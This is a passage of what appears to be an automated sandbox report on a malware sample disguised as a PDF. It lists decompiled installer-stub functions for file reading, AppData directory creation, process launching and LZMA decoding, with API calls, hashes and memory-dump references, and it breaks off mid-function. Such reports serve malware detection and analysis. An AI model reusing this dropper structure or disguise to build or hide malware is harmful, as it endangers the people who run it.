                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 3585118688-0
                                                                      • Opcode ID: c899fe866d2f0edb1c10e4399fedef53746bea19b9304985ffa877c7d9edaec5
                                                                      • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
                                                                      • Opcode Fuzzy Hash: c899fe866d2f0edb1c10e4399fedef53746bea19b9304985ffa877c7d9edaec5
                                                                      • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040317B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 92%
                                                                      			E0040317B(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a298;
					 *0x418ed4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403283(4);
				if(_t22 >= 0) {
					_t24 = E00405E6A( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x418ed4 =  *0x418ed4 + 4;
						_t36 = E00403283(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x418ed4 =  *0x418ed4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E6A( *0x40a01c, 0x414ed0, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E99(_a8, 0x414ed0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x418ed4 =  *0x418ed4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                      0x0040317f
                                                                      0x00403188
                                                                      0x00403191
                                                                      0x00403195
                                                                      0x004031a0
                                                                      0x004031a0
                                                                      0x004031a8
                                                                      0x004031af
                                                                      0x004031c1
                                                                      0x004031c8
                                                                      0x0040326d
                                                                      0x0040326d
                                                                      0x00000000
                                                                      0x004031ce
                                                                      0x004031d1
                                                                      0x004031dd
                                                                      0x004031e1
                                                                      0x0040327b
                                                                      0x0040327b
                                                                      0x004031e7
                                                                      0x004031ea
                                                                      0x00403249
                                                                      0x0040324f
                                                                      0x00403251
                                                                      0x00403251
                                                                      0x00403263
                                                                      0x0040326b
                                                                      0x00403272
                                                                      0x00403275
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004031ec
                                                                      0x004031ef
                                                                      0x00000000
                                                                      0x004031f5
                                                                      0x004031fa
                                                                      0x00403201
                                                                      0x00403204
                                                                      0x00403206
                                                                      0x00403206
                                                                      0x00403213
                                                                      0x0040321d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403226
                                                                      0x0040322d
                                                                      0x00403245
                                                                      0x0040326f
                                                                      0x0040326f
                                                                      0x0040322f
                                                                      0x0040322f
                                                                      0x00403232
                                                                      0x00403235
                                                                      0x0040323b
                                                                      0x00403241
                                                                      0x00000000
                                                                      0x00403243
                                                                      0x00000000
                                                                      0x00403243
                                                                      0x00403241
                                                                      0x00000000
                                                                      0x0040322d
                                                                      0x00000000
                                                                      0x004031fa
                                                                      0x004031ef
                                                                      0x004031ea
                                                                      0x004031e1
                                                                      0x004031c8
                                                                      0x0040327d
                                                                      0x00403280

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0
                                                                      Strings
                                                                      • <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3, xrefs: 004031F5, 0040320C, 00403222
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID: <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3
                                                                      • API String ID: 973152223-3394693240
                                                                      • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                                      • Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
                                                                      • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                                      • Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C53(0xfffffff0);
				_t17 = E00405C71(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405BF3(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004058BD( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E004058DA(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405840( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                      0x004015c1
                                                                      0x004015c9
                                                                      0x004015cc
                                                                      0x004015d1
                                                                      0x004015d5
                                                                      0x004015d7
                                                                      0x004015df
                                                                      0x004015e1
                                                                      0x004015e4
                                                                      0x004015ea
                                                                      0x00401604
                                                                      0x00401607
                                                                      0x004015ec
                                                                      0x004015ec
                                                                      0x004015ef
                                                                      0x00000000
                                                                      0x004015fa
                                                                      0x004015fd
                                                                      0x004015fd
                                                                      0x004015ef
                                                                      0x0040160e
                                                                      0x00401615
                                                                      0x00401624
                                                                      0x00401624
                                                                      0x00401617
                                                                      0x0040161a
                                                                      0x00401622
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401622
                                                                      0x00401615
                                                                      0x00401627
                                                                      0x0040162b
                                                                      0x0040162c
                                                                      0x004015d7
                                                                      0x00401634
                                                                      0x00401663
                                                                      0x0040224b
                                                                      0x00401636
                                                                      0x00401638
                                                                      0x00401645
                                                                      0x0040164d
                                                                      0x00401655
                                                                      0x0040165b
                                                                      0x0040165b
                                                                      0x00401655
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                        • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,76A63420,?,76A62EE0,00405A23,?,76A63420,76A62EE0,00000000), ref: 00405C7F
                                                                        • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                                        • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                        • Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Deskriptiv155\Hjertere,?,00000000,000000F0), ref: 0040164D
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Deskriptiv155\Hjertere, xrefs: 00401640
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Local\Deskriptiv155\Hjertere
                                                                      • API String ID: 1892508949-713220995
                                                                      • Opcode ID: 73f8be4de0566795e0a1dcdcda1cf682a7a19378213ae80198bd42342aad00da
                                                                      • Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
                                                                      • Opcode Fuzzy Hash: 73f8be4de0566795e0a1dcdcda1cf682a7a19378213ae80198bd42342aad00da
                                                                      • Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004058F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004058F2(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426730->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                      0x004058fb
                                                                      0x0040591b
                                                                      0x00405923
                                                                      0x00405928
                                                                      0x00000000
                                                                      0x0040592e
                                                                      0x00405932

                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                                      • CloseHandle.KERNEL32(?), ref: 00405928
                                                                      Strings
                                                                      • Error launching installer, xrefs: 00405905
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                      • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
                                                                      • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                      • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405E6A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405E6A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                      0x00405e6e
                                                                      0x00405e7e
                                                                      0x00405e86
                                                                      0x00000000
                                                                      0x00405e8d
                                                                      0x00000000
                                                                      0x00405e8f

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,<?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3,B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405,004033FF,0040A230,0040A230,00403303,<?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3,00004000,?,00000000,004031AD), ref: 00405E7E
                                                                      Strings
                                                                      • <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3, xrefs: 00405E6D
                                                                      • B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405, xrefs: 00405E6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3$B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405
                                                                      • API String ID: 2738559852-201836575
                                                                      • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                      • Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
                                                                      • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                      • Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406D0F Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 99%
                                                                      			E00406D0F() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M0040717D))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
